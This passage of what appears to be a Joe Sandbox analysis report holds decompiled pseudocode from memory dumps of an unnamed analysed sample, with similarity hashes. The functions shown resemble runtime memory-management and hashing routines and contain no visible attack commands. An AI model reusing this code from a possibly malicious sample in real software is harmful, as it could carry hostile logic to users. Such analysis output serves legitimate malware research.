                                                                                                                            				r12d = _t40;
                                                                                                                            				_t276 = r12d;
                                                                                                                            				if (E0000025B25BF8A6743C(_t281, _t362 - 0x70 + (_t276 + _t276 * 2) * 8, _t362 - 0x58, E0000025B25BF8A6B384, _t362 - 0x70 + (_t207 + _t207 * 2) * 8) != 0) goto 0xf8a6961a;
                                                                                                                            				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a6961a;
                                                                                                                            				r12d = r12d + 1;
                                                                                                                            				if (_t207 + 1 - r14d < 0) goto 0xf8a69385;
                                                                                                                            				_t241 = E0000025B25BF8A666B8(_t276, _t364 + 0x40,  *((intOrPtr*)(_t364 + 0x20)));
                                                                                                                            				if (_t241 != 0) goto 0xf8a6961a;
                                                                                                                            				_t56 = _t276 + 1; // 0x1
                                                                                                                            				E0000025B25BF8A67FD4(_t56, _t241, _t364 + 0x40);
                                                                                                                            				r12d = 0;
                                                                                                                            				r8d = 0;
                                                                                                                            				_t59 = _t281 + 1; // 0x1
                                                                                                                            				r9d = _t59;
                                                                                                                            				r13d = 0;
                                                                                                                            				_t304 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 0x58)))) - 1;
                                                                                                                            				 *(_t364 + 0x38) = _t304;
                                                                                                                            				goto 0xf8a69427;
                                                                                                                            				r9d = r9d - 1;
                                                                                                                            				 *((intOrPtr*)(_t364 + 0x30)) = r9d;
                                                                                                                            				if (_t241 != 0) goto 0xf8a69456;
                                                                                                                            				if (_t304 == 0xffffffff) goto 0xf8a6957f;
                                                                                                                            				r9d = 0x1c;
                                                                                                                            				r8d =  *( *((intOrPtr*)( *((intOrPtr*)(_t364 + 0x58)) + 0x10)) + _t304 * 4);
                                                                                                                            				 *((intOrPtr*)(_t364 + 0x30)) = r9d;
                                                                                                                            				 *(_t364 + 0x38) = _t304 - 1;
                                                                                                                            				r8d = r8d + r8d;
                                                                                                                            				 *(_t364 + 0x60) = r8d;
                                                                                                                            				_t193 = r8d >> 0x0000001b & 0x00000001;
                                                                                                                            				if (r12d != 0) goto 0xf8a69470;
                                                                                                                            				if (_t193 == 0) goto 0xf8a69422;
                                                                                                                            				if (r12d != 1) goto 0xf8a694b5;
                                                                                                                            				if (_t193 != 0) goto 0xf8a694b5;
                                                                                                                            				if (E0000025B25BF8A66630(_t364 + 0x40, _t364 + 0x40, _t364 + 0x68) != 0) goto 0xf8a69610;
                                                                                                                            				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a69610;
                                                                                                                            				goto 0xf8a6956b;
                                                                                                                            				r12d = 2;
                                                                                                                            				r13d = r13d | _t193 << 6;
                                                                                                                            				if (1 != 7) goto 0xf8a69427;
                                                                                                                            				_t384 =  *((intOrPtr*)(_t364 + 0x28));
                                                                                                                            				if (7 <= 0) goto 0xf8a6951e;
                                                                                                                            				_t78 = _t364 + 0x40; // 0x42
                                                                                                                            				_t79 = _t364 + 0x40; // 0x42
                                                                                                                            				if (E0000025B25BF8A66630(_t79, _t78, _t364 + 0x68) != 0) goto 0xf8a69610;
                                                                                                                            				if ( *_t384() != 0) goto 0xf8a69610;
                                                                                                                            				if (1 - 7 < 0) goto 0xf8a694e3;
                                                                                                                            				_t278 = r13d;
                                                                                                                            				_t84 = _t364 + 0x40; // 0x42
                                                                                                                            				_t89 = _t364 + 0x40; // 0x42
                                                                                                                            				if (E0000025B25BF8A6743C(_t281, _t89, _t362 - 0x70 + (_t278 + _t278 * 2) * 8, E0000025B25BF8A6B384, _t84) != 0) goto 0xf8a69610;
                                                                                                                            				_t91 = _t364 + 0x68; // 0x6a
                                                                                                                            				if ( *_t384() != 0) goto 0xf8a69610;
                                                                                                                            				_t93 = _t278 + 1; // 0x1
                                                                                                                            				r12d = _t93;
                                                                                                                            				r13d = 0;
                                                                                                                            				r8d =  *(_t364 + 0x60);
                                                                                                                            				r9d =  *((intOrPtr*)(_t364 + 0x30));
                                                                                                                            				goto 0xf8a69422;
                                                                                                                            				if (r12d != 2) goto 0xf8a69600;
                                                                                                                            				if (0 <= 0) goto 0xf8a69600;
                                                                                                                            				if (0 <= 0) goto 0xf8a69600;
                                                                                                                            				_t385 =  *((intOrPtr*)(_t364 + 0x28));
                                                                                                                            				if (E0000025B25BF8A66630(_t364 + 0x40, _t364 + 0x40, _t91) != 0) goto 0xf8a69610;
                                                                                                                            				if ( *_t385() != 0) goto 0xf8a69610;
                                                                                                                            				r13d = r13d + r13d;
                                                                                                                            				if ((r13d & r14d) == 0) goto 0xf8a695fa;
                                                                                                                            				if (E0000025B25BF8A6743C(_t281, _t364 + 0x40, _t362 - 0x58, E0000025B25BF8A6B384, _t364 + 0x40) != 0) goto 0xf8a69610;
                                                                                                                            				if ( *_t385() != 0) goto 0xf8a69610;
                                                                                                                            				if (1 < 0) goto 0xf8a69594;
                                                                                                                            				_t351 =  *((intOrPtr*)(_t362 - 0x80));
                                                                                                                            				_t153 = E0000025B25BF8A69038(_t152, _t364 + 0x40,  *((intOrPtr*)(_t362 - 0x80)));
                                                                                                                            				_t113 = _t364 + 0x40; // 0x42
                                                                                                                            				_t154 = E0000025B25BF8A67578(_t153, _t113,  *((intOrPtr*)(_t362 - 0x80)));
                                                                                                                            				_t114 = _t364 + 0x68; // 0x6a
                                                                                                                            				_t156 = E0000025B25BF8A67578(E0000025B25BF8A67578(_t154, _t114,  *((intOrPtr*)(_t362 - 0x80))), _t362 - 0x58,  *((intOrPtr*)(_t362 - 0x80)));
                                                                                                                            				_t265 = r15d - r14d;
                                                                                                                            				if (_t265 >= 0) goto 0xf8a69658;
                                                                                                                            				r14d = r14d - r15d;
                                                                                                                            				E0000025B25BF8A67578(_t156, _t362 - 0x70 + (r15d + r15d * 2) * 8,  *((intOrPtr*)(_t362 - 0x80)));
                                                                                                                            				if (_t265 != 0) goto 0xf8a69647;
                                                                                                                            				return E0000025B25BF8A81A50(6, _t281,  *(_t362 + 0x1790) ^ _t364, _t351, _t362 - 0x70 + (r15d + r15d * 2) * 8 + 0x18, E0000025B25BF8A6B384 - 1, _t362, _t385);
                                                                                                                            			}


                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 513b23b7baf28647798e21d3b085801eaa99bec09bbee1beb230918fb9cff029
                                                                                                                            • Instruction ID: 5c370684c67384ebb47c4fbaee49b4921e2d1668953306736520da4d17145667
                                                                                                                            • Opcode Fuzzy Hash: 513b23b7baf28647798e21d3b085801eaa99bec09bbee1beb230918fb9cff029
                                                                                                                            • Instruction Fuzzy Hash: 6BE1E477304E4291EF229B24DC9C3AE63A0F7947A9FA42111FA4E87E9DEB34C905C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 32%
                                                                                                                            			E01324AC0(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __edi, unsigned long long __rax, unsigned int __rbx, signed int __rcx, long long __rbp, void* __r13, void* __r14, void* __r15, unsigned long long _a8, unsigned int _a16, signed int _a24) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				unsigned long long _v32;
                                                                                                                            				unsigned int _v40;
                                                                                                                            				unsigned long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				unsigned long long _v64;
                                                                                                                            				signed long long _v72;
                                                                                                                            				signed long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				signed long long _v96;
                                                                                                                            				signed long long _v104;
                                                                                                                            				void* _t112;
                                                                                                                            				void* _t113;
                                                                                                                            				void* _t117;
                                                                                                                            				void* _t118;
                                                                                                                            				signed int _t120;
                                                                                                                            				signed int _t129;
                                                                                                                            				unsigned long long _t144;
                                                                                                                            				signed long long _t148;
                                                                                                                            				signed long long _t150;
                                                                                                                            				long long _t153;
                                                                                                                            				signed long long _t155;
                                                                                                                            				long long _t159;
                                                                                                                            				long long _t161;
                                                                                                                            				signed long long _t176;
                                                                                                                            				long long _t177;
                                                                                                                            				signed long long _t181;
                                                                                                                            				long long _t183;
                                                                                                                            				long long _t186;
                                                                                                                            				unsigned long long _t192;
                                                                                                                            				signed long long _t193;
                                                                                                                            				signed long long _t194;
                                                                                                                            				long long _t195;
                                                                                                                            				unsigned long long _t201;
                                                                                                                            				unsigned long long _t202;
                                                                                                                            				unsigned long long _t203;
                                                                                                                            				signed long long _t204;
                                                                                                                            				signed long long _t219;
                                                                                                                            				signed long long _t220;
                                                                                                                            				unsigned long long _t227;
                                                                                                                            				unsigned long long _t229;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t232 = __r14;
                                                                                                                            					_t212 = __rbp;
                                                                                                                            					_t167 = __rcx;
                                                                                                                            					_t163 = __rbx;
                                                                                                                            					_t144 = __rax;
                                                                                                                            					_t127 = __edx;
                                                                                                                            					_t110 = __eax;
                                                                                                                            					if( &_v8 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L24;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t212 =  &_v8;
                                                                                                                            					_a24 = __rcx;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_t167 = __rcx << 0xd;
                                                                                                                            					_t219 = 0 + __rbx >> 0x16;
                                                                                                                            					_t201 = __rbx + _t167 + 0xffffffff;
                                                                                                                            					_t229 = _t201;
                                                                                                                            					_t202 = _t201 >> 0x16;
                                                                                                                            					_t120 = __ebx & 0x003fffff;
                                                                                                                            					_t163 = __rbx >> 0xd;
                                                                                                                            					_v32 = _t163;
                                                                                                                            					_t129 = __edi & 0x003fffff;
                                                                                                                            					_t192 = __rbx + _t167 - 1 >> 0xd;
                                                                                                                            					if(_t202 == 0) {
                                                                                                                            						L4:
                                                                                                                            						if(0 >= 0x2000) {
                                                                                                                            							L7:
                                                                                                                            							_t124 = 0x2000;
                                                                                                                            							E013588E0();
                                                                                                                            							goto L8;
                                                                                                                            						} else {
                                                                                                                            							L5:
                                                                                                                            							_t183 =  *((intOrPtr*)(__rax + 0x5d6dde0));
                                                                                                                            							_v16 = _t183;
                                                                                                                            							r8d = r8d & 0x00001fff;
                                                                                                                            							_v72 = 0;
                                                                                                                            							_v80 = _t192 - _t163 + 1;
                                                                                                                            							_t159 = _t183 + (_t219 << 7) + 0x40;
                                                                                                                            							_t117 = E01327440(__eax, __ecx, __edx, _t129, _t159, _t163, _t192 - _t163 + 1,  &_v8, __r14);
                                                                                                                            							_v88 = _t159;
                                                                                                                            							_t113 = E01327B60(_t117, __ecx, _t129, _v72 + _v16, _v32, _v80,  &_v8, __r14);
                                                                                                                            							_t155 = _v88;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						_t227 = 0 >> 0x23;
                                                                                                                            						if(0 >= 0x2000) {
                                                                                                                            							L23:
                                                                                                                            							_t144 = _t227;
                                                                                                                            							E013588E0();
                                                                                                                            							goto L24;
                                                                                                                            						} else {
                                                                                                                            							L3:
                                                                                                                            							_v40 = _t229;
                                                                                                                            							_v48 = _t192;
                                                                                                                            							_v56 = 0;
                                                                                                                            							_v64 = _t202;
                                                                                                                            							_t186 =  *((intOrPtr*)(__rax + 0x5d6dde0));
                                                                                                                            							_v16 = _t186;
                                                                                                                            							r8d = r8d & 0x00001fff;
                                                                                                                            							_v72 = 0;
                                                                                                                            							_t27 = _t163 - 0x200; // -512
                                                                                                                            							_v80 =  ~_t27;
                                                                                                                            							_t161 = _t186 + (_t219 << 7) + 0x40;
                                                                                                                            							_t118 = E01327440(__eax, __ecx, __edx, _t129, _t161, _t163,  ~_t27,  &_v8, __r14);
                                                                                                                            							_v88 = _t161;
                                                                                                                            							_t163 = _v32;
                                                                                                                            							_t167 = _v80;
                                                                                                                            							_t110 = E01327B60(_t118, __ecx, _t129, _v72 + _v16, _t163, _t167,  &_v8, __r14);
                                                                                                                            							_t176 = _v56 + 1;
                                                                                                                            							_t203 = _a8;
                                                                                                                            							_t193 = _v64;
                                                                                                                            							_t220 = _v88;
                                                                                                                            							L9:
                                                                                                                            							_v104 = _t220;
                                                                                                                            							if(_t176 >= _t193) {
                                                                                                                            								L13:
                                                                                                                            								_t148 = _v40 >> 0x23;
                                                                                                                            								if(_t148 >= 0x2000) {
                                                                                                                            									L15:
                                                                                                                            									_t124 = 0x2000;
                                                                                                                            									E013588E0();
                                                                                                                            									goto L16;
                                                                                                                            								} else {
                                                                                                                            									L14:
                                                                                                                            									_t177 =  *((intOrPtr*)(_t203 + 0x78 + _t148 * 8));
                                                                                                                            									_v16 = _t177;
                                                                                                                            									_t194 = _t193 << 7;
                                                                                                                            									_v72 = _t194;
                                                                                                                            									_t153 = _t177 + _t194 + 0x40;
                                                                                                                            									_v80 = _v48 + 1;
                                                                                                                            									_t112 = E01327440(_t110, _t124, _t127, _t129 & 0x00001fff, _t153, _t163, _v48 + 1, _t212, _t232);
                                                                                                                            									_v88 = _t153;
                                                                                                                            									_t120 = 0;
                                                                                                                            									_t113 = E01327B60(_t112, _t124, _t129 & 0x00001fff, _v72 + _v16, _t163, _v80, _t212, _t232);
                                                                                                                            									_t155 = _v104 + _v88;
                                                                                                                            								}
                                                                                                                            							} else {
                                                                                                                            								L10:
                                                                                                                            								_t150 = _t176 >> 0xd;
                                                                                                                            								if(_t150 >= 0x2000) {
                                                                                                                            									L22:
                                                                                                                            									E013588E0();
                                                                                                                            									goto L23;
                                                                                                                            								} else {
                                                                                                                            									L11:
                                                                                                                            									_v96 = _t176;
                                                                                                                            									_t195 =  *((intOrPtr*)(_t203 + 0x78 + _t150 * 8));
                                                                                                                            									_v16 = _t195;
                                                                                                                            									_t127 = _t127 & 0x00001fff;
                                                                                                                            									_t181 = _t176 << 7;
                                                                                                                            									_v72 = _t181;
                                                                                                                            									_t148 = _t195 + _t181 + 0x40;
                                                                                                                            									_v24 = _t148;
                                                                                                                            									_t124 = 0x200;
                                                                                                                            									E01327440(_t110, 0x200, _t127, _t129, _t148, _t163, _t167, _t212, _t232);
                                                                                                                            									_t176 = _v104 + _t148;
                                                                                                                            									_t203 = _v72 + _v16;
                                                                                                                            									L17:
                                                                                                                            									if(_t148 < 8) {
                                                                                                                            										L16:
                                                                                                                            										 *((long long*)(_t203 + _t148 * 8)) = 0xffffffff;
                                                                                                                            										_t148 = _t148 + 1;
                                                                                                                            										goto L17;
                                                                                                                            									}
                                                                                                                            									L18:
                                                                                                                            									L12:
                                                                                                                            									_t204 = _v24;
                                                                                                                            									_t110 = 0;
                                                                                                                            									L20:
                                                                                                                            									while(_t148 < 8) {
                                                                                                                            										 *((long long*)(_t204 + _t148 * 8)) = 0;
                                                                                                                            										_t148 = _t148 + 1;
                                                                                                                            									}
                                                                                                                            									L8:
                                                                                                                            									_t227 = _v96 + 1;
                                                                                                                            									_t203 = _a8;
                                                                                                                            									_t193 = _v64;
                                                                                                                            									_t220 = _t176;
                                                                                                                            									_t176 = _t227;
                                                                                                                            									goto L9;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L6:
                                                                                                                            					_v104 = _t155;
                                                                                                                            					return E013244E0(_t113, _t120, _t127, _a8, _a16, _a24, _t212, _t232);
                                                                                                                            					L25:
                                                                                                                            					L24:
                                                                                                                            					_a8 = _t144;
                                                                                                                            					_a16 = _t163;
                                                                                                                            					_a24 = _t167;
                                                                                                                            					E01356200(_t176, _t212);
                                                                                                                            				}
                                                                                                                            			}


                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 586158c531032f4696bb1d17142ab912e93e5a8a1f81e32739356ddecd6cd772
                                                                                                                            • Instruction ID: 17f383c567b2a7b838c0a10d8b9c9c7639598751e0b48e51a0f5255fb1706cc1
                                                                                                                            • Opcode Fuzzy Hash: 586158c531032f4696bb1d17142ab912e93e5a8a1f81e32739356ddecd6cd772
                                                                                                                            • Instruction Fuzzy Hash: 1C919877218B9586DB20DB19F08035ABBA5F786BD8F546226EBDE53B59CB3CC051CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E01308240(signed int __eax, signed int* __rax, signed int __rbx, signed long long __rcx) {
                                                                                                                            				void* _t66;
                                                                                                                            				void* _t67;
                                                                                                                            				signed long long _t79;
                                                                                                                            				signed long long _t83;
                                                                                                                            				signed long long _t86;
                                                                                                                            				signed int* _t90;
                                                                                                                            				signed long long _t98;
                                                                                                                            				signed long long _t109;
                                                                                                                            				signed long long _t111;
                                                                                                                            				signed long long _t119;
                                                                                                                            				signed long long _t121;
                                                                                                                            
                                                                                                                            				_t91 = __rcx;
                                                                                                                            				_t73 = __rax;
                                                                                                                            				_t44 = __eax;
                                                                                                                            				_t86 = __rbx ^  *0x14cf5a0 ^ 0x78bd642f;
                                                                                                                            				if(__rcx == 0) {
                                                                                                                            					return __eax;
                                                                                                                            				} else {
                                                                                                                            					_t66 = __rcx - 4;
                                                                                                                            					if(_t66 < 0) {
                                                                                                                            						_t91 = __rcx;
                                                                                                                            					} else {
                                                                                                                            						if(_t66 == 0) {
                                                                                                                            						} else {
                                                                                                                            							_t67 = __rcx - 8;
                                                                                                                            							if(_t67 < 0) {
                                                                                                                            								_t44 =  *(__rax + __rcx - 4);
                                                                                                                            							} else {
                                                                                                                            								if(_t67 == 0) {
                                                                                                                            								} else {
                                                                                                                            									if(__rcx > 0x10) {
                                                                                                                            										if(__rcx <= 0x30) {
                                                                                                                            											_t98 = __rcx;
                                                                                                                            										} else {
                                                                                                                            											_t98 = __rcx;
                                                                                                                            											_t119 = _t86;
                                                                                                                            											_t109 = _t119;
                                                                                                                            											while(_t91 > 0x30) {
                                                                                                                            												_t90 = _t73;
                                                                                                                            												_t44 = _t44 * ( *_t73 ^ 0xa0b428db) * (_t90[4] ^ 0x9c88c6e3) * (_t90[8] ^ 0x75374cc3);
                                                                                                                            												_t91 = _t91 + 0xffffffd0;
                                                                                                                            												_t121 = _t73[2] ^ _t86 ^ _t98;
                                                                                                                            												0;
                                                                                                                            												_t111 = _t90[6] ^ _t119 ^ _t98;
                                                                                                                            												_t83 = _t90[0xa] ^ _t109 ^ _t98;
                                                                                                                            												_t43 =  &(_t90[0xc]); // -8161530843051276525
                                                                                                                            												_t86 = _t121;
                                                                                                                            												_t119 = _t111;
                                                                                                                            												_t109 = _t83;
                                                                                                                            												_t73 = _t43;
                                                                                                                            											}
                                                                                                                            											_t86 = _t86 ^ _t119 ^ _t109;
                                                                                                                            											L17:
                                                                                                                            											while(_t91 > 0x10) {
                                                                                                                            												_t44 = _t44 * ( *_t73 ^ 0xa0b428db);
                                                                                                                            												_t91 = _t91 + 0xfffffff0;
                                                                                                                            												_t79 = _t73[2] ^ _t86 ^ _t98;
                                                                                                                            												_t86 = _t79;
                                                                                                                            												_t73 =  &(_t73[4]);
                                                                                                                            											}
                                                                                                                            											_t91 = _t98;
                                                                                                                            											goto L15;
                                                                                                                            										}
                                                                                                                            										goto L17;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L15:
                                                                                                                            					return _t44 * 0xa0b428db * 0xc47d124f;
                                                                                                                            				}
                                                                                                                            			}















                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ba78f681946b52f0f48d3868601dc9d2aef480fe8b4301b32dbd940ef966982
                                                                                                                            • Instruction ID: ca059d94d7a0dce1a87227edfa7574ed83e28338e8f32c9119022c304001c438
                                                                                                                            • Opcode Fuzzy Hash: 0ba78f681946b52f0f48d3868601dc9d2aef480fe8b4301b32dbd940ef966982
                                                                                                                            • Instruction Fuzzy Hash: 2141E9A6B01B5981EE058A6649300AEA7A5E74EFD4389E273CF1D77BACC63CD506C344
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 49%
                                                                                                                            			E01318900(long long __rax, void* __rdi, long long __rbp, intOrPtr __r14, long long _a8) {
                                                                                                                            				char _v8;
                                                                                                                            				signed long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				char _v32;
                                                                                                                            				signed long long _v40;
                                                                                                                            				signed int _v41;
                                                                                                                            				void* _t41;
                                                                                                                            				void* _t43;
                                                                                                                            				signed int _t49;
                                                                                                                            				void* _t58;
                                                                                                                            				void* _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				intOrPtr _t74;
                                                                                                                            				void* _t77;
                                                                                                                            				intOrPtr _t80;
                                                                                                                            				void* _t86;
                                                                                                                            				intOrPtr _t88;
                                                                                                                            				intOrPtr _t89;
                                                                                                                            				signed long long _t90;
                                                                                                                            				void* _t92;
                                                                                                                            				char* _t97;
                                                                                                                            				void* _t102;
                                                                                                                            				long long* _t103;
                                                                                                                            				intOrPtr _t109;
                                                                                                                            				void* _t112;
                                                                                                                            				signed long long _t113;
                                                                                                                            				signed long long _t116;
                                                                                                                            				void* _t118;
                                                                                                                            				void* _t121;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t119 = __r14;
                                                                                                                            					_t92 = __rdi;
                                                                                                                            					_t78 = __rax;
                                                                                                                            					if(_t102 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L32:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					E01356200(_t86, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_t103 = _t102 - 0x58;
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t97 =  &_v8;
                                                                                                                            				if( *((intOrPtr*)( *((intOrPtr*)(__rax + 0x30)))) == __r14) {
                                                                                                                            					return _t41;
                                                                                                                            				} else {
                                                                                                                            					_t88 =  *((intOrPtr*)(__r14 + 0x30));
                                                                                                                            					if( *((intOrPtr*)(_t88 + 0xd8)) > 0 ||  *((long long*)(_t88 + 0xd0)) != 0) {
                                                                                                                            						return _t41;
                                                                                                                            					} else {
                                                                                                                            						_a8 = __rax;
                                                                                                                            						_t49 = 0;
                                                                                                                            						while(1) {
                                                                                                                            							_t89 =  *0x14cfd60; // 0x0
                                                                                                                            							_t109 =  *0x14cfd68; // 0x0
                                                                                                                            							_t116 =  *0x14cfd28; // 0x0
                                                                                                                            							asm("xorps xmm0, xmm0");
                                                                                                                            							asm("repne dec ecx");
                                                                                                                            							asm("dec ax");
                                                                                                                            							asm("mulsd xmm0, xmm1");
                                                                                                                            							asm("repne dec eax");
                                                                                                                            							asm("dec cx");
                                                                                                                            							asm("movsd xmm1, [0xfdb78]");
                                                                                                                            							asm("mulsd xmm1, xmm0");
                                                                                                                            							asm("repne dec esp");
                                                                                                                            							_t112 =  <  ? _t109 :  ~( *(_t78 + 0x180));
                                                                                                                            							r8d = 0x10000;
                                                                                                                            							_t90 =  <  ? _t109 : _t89;
                                                                                                                            							if(_t116 <= 0) {
                                                                                                                            								goto L13;
                                                                                                                            							}
                                                                                                                            							L9:
                                                                                                                            							if(_t116 >= _t90) {
                                                                                                                            								 *(_t78 + 0x180) =  *(_t78 + 0x180) + _t112;
                                                                                                                            								_t116 = _t90;
                                                                                                                            							} else {
                                                                                                                            								asm("xorps xmm1, xmm1");
                                                                                                                            								asm("repne dec ecx");
                                                                                                                            								asm("mulsd xmm1, xmm0");
                                                                                                                            								asm("repne dec esp");
                                                                                                                            								 *(_t78 + 0x180) = _t112 +  *(_t78 + 0x180) + 1;
                                                                                                                            							}
                                                                                                                            							_t113 = _t116;
                                                                                                                            							_t116 =  ~_t116;
                                                                                                                            							asm("lock dec ebp");
                                                                                                                            							_t90 = _t90 - _t113;
                                                                                                                            							if(_t90 == 0) {
                                                                                                                            								if(_t49 != 0) {
                                                                                                                            									_t43 = L0134BA20(0x2c, 1, _t53, 0, _t59, _t60, _t77, _t78, 0xffffffff, _t85, _t92, _t92, _t97, _t119, _t121);
                                                                                                                            								}
                                                                                                                            								return _t43;
                                                                                                                            							} else {
                                                                                                                            								goto L13;
                                                                                                                            							}
                                                                                                                            							goto L33;
                                                                                                                            							L13:
                                                                                                                            							if( *0x14814f0 != 0 && _t49 == 0) {
                                                                                                                            								_v40 = _t90;
                                                                                                                            								L0134BA20(0x2b, 1, _t53, 0, _t59, _t60, _t77, _t78, 0x1318ba0, _t85, _t92, _t92, _t97, _t119, _t121);
                                                                                                                            								_t78 = _a8;
                                                                                                                            								_t90 = _v40;
                                                                                                                            								_t49 = 1;
                                                                                                                            							}
                                                                                                                            							_v41 = _t49;
                                                                                                                            							asm("inc esp");
                                                                                                                            							_v16 = 0;
                                                                                                                            							_v32 = 0x1318ba0;
                                                                                                                            							_v24 = _t78;
                                                                                                                            							_v16 = _t90;
                                                                                                                            							_t91 =  &_v32;
                                                                                                                            							 *_t103 =  &_v32;
                                                                                                                            							_t43 = E013560C0(1, _t49, _t53, 0, _t58, _t59, _t60, _t77, _t97, _t116, 0x14cfd28, _t118, _t119, _t121);
                                                                                                                            							asm("inc ebp");
                                                                                                                            							_t119 =  *((intOrPtr*)( *[gs:0x28]));
                                                                                                                            							_t80 = _a8;
                                                                                                                            							_t85 =  *((intOrPtr*)(_t80 + 0x88));
                                                                                                                            							if( *0x14cf560 != 0) {
                                                                                                                            								_t92 = _t80 + 0x88;
                                                                                                                            								_t53 = 0;
                                                                                                                            								_t43 = E01358540(_t80,  &_v32);
                                                                                                                            							} else {
                                                                                                                            								 *((long long*)(_t80 + 0x88)) = 0;
                                                                                                                            								_t74 = _t85;
                                                                                                                            							}
                                                                                                                            							if(_t74 != 0) {
                                                                                                                            								_t43 = L01315680(_t92, _t97, _t119);
                                                                                                                            								_t80 = _a8;
                                                                                                                            							}
                                                                                                                            							if( *((long long*)(_t80 + 0x180)) >= 0) {
                                                                                                                            								L29:
                                                                                                                            								_t54 = _v41 & 0x000000ff;
                                                                                                                            								if((_v41 & 0x000000ff) != 0) {
                                                                                                                            									_t43 = L0134BA20(0x2c, 1, _t54, 0, _t59, _t60, _t77, _t80, 0xffffffff, _t85, _t92, _t92, _t97, _t119, _t121);
                                                                                                                            								}
                                                                                                                            								return _t43;
                                                                                                                            							} else {
